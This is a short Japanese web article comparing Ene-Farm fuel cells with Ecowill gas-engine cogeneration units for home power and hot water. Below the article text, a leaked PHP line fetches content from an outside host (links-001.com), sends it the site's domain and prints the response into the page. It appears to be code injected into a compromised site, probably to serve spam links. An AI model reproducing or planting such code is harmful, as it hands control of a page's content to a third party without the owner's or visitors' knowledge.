前へ
次へ

エネファームとエコウィルの違いを知っておく

自家発電ができれば自宅に停電などでも電気が使えるかもしれません。
今は太陽光発電など各家庭で自家発電できる仕組みが浸透しつつあり比較的簡単に発電の仕組みを取り入れることができます。
そんな中ガスを使って発電をして、余った熱を使ってお湯を沸かすエコな仕組みがあるので利用を検討してみましょう。
まずはエネファームと言われる仕組みで、こちらは都市ガスに含まれる水素と空気中の酸素を化学反応させて発電させ、発電時に発生する熱でお湯を沸かします。
ガスなので発電所のように蒸気を作ってタービンを回すイメージがあるかもしれませんが、全く異なる仕組みで発電さらに給湯をします。
エコウィルはガスを燃料として発電をし、その時に出る排熱を使ってお湯を作ります。
エネファームは都市ガスしか使えませんが、エコウィルは都市ガスの他LPガスを使うタイプもあります。
どちらの方が効率がいいのかなどはメーカーなどによっても違いがあるので、自宅の電気需要やガス需要に合わせて選ぶと良いでしょう。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top